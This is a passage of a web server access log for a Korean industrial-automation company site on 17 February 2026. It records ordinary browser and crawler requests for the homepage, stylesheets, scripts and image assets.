10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:07:28:13 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:07:28:13 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:07:28:13 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:07:28:13 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:07:28:13 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:07:28:13 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:07:28:13 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:07:28:13 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:07:28:13 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:07:28:13 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:12:35:28 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:12:35:28 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:12:35:28 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:12:35:28 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:12:35:28 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:12:35:28 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:12:35:28 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:12:35:28 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:12:35:28 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:12:35:28 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:12:35:28 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:12:35:28 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:12:35:28 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:13:00:11 +0000] - - 301 - GET http www.hanmocnn.co.kr "/robots.txt" [Client 74.7.244.50] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" -[17/Feb/2026:13:00:12 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/robots.txt" [Client 74.7.244.50] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "http://www.hanmocnn.co.kr/robots.txt" -[17/Feb/2026:13:00:12 +0000] - - 301 - GET http www.hanmocnn.co.kr "/" [Client 74.7.243.250] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr" -[17/Feb/2026:13:36:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 211.234.204.1] [Length 10427] [Gzip 5.45] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[17/Feb/2026:13:36:34 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:13:36:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 211.234.204.1] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:13:36:34 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:13:36:34 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:13:36:34 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:13:36:34 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:13:36:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 211.234.204.1] [Length 20913] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:13:36:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 211.234.204.1] [Length 2848] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:13:36:35 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:13:36:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 211.234.204.1] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:13:36:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 211.234.204.1] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:13:36:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 211.234.204.1] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:17:22:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 141.51.110.126] [Length 10440] [Gzip 5.45] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[17/Feb/2026:21:41:36 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:21:41:36 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:21:41:36 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:21:41:36 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:21:41:36 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:21:41:36 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:21:41:36 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:21:41:36 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:21:41:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:21:41:36 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:21:41:36 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:21:41:36 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:21:41:36 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:21:56:56 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:21:56:56 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:21:56:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:39:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10427] [Gzip 5.45] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:22:39:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:39:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:39:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:39:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:39:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:39:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:39:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20925] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:39:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:39:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:39:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:39:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:39:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:39:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:51:14 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10427] [Gzip 5.45] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:22:51:14 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:51:14 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:51:14 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:51:14 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:51:14 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:51:14 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:51:14 +0000] - 200 200 - GET https www.hanmocnn.co.kr 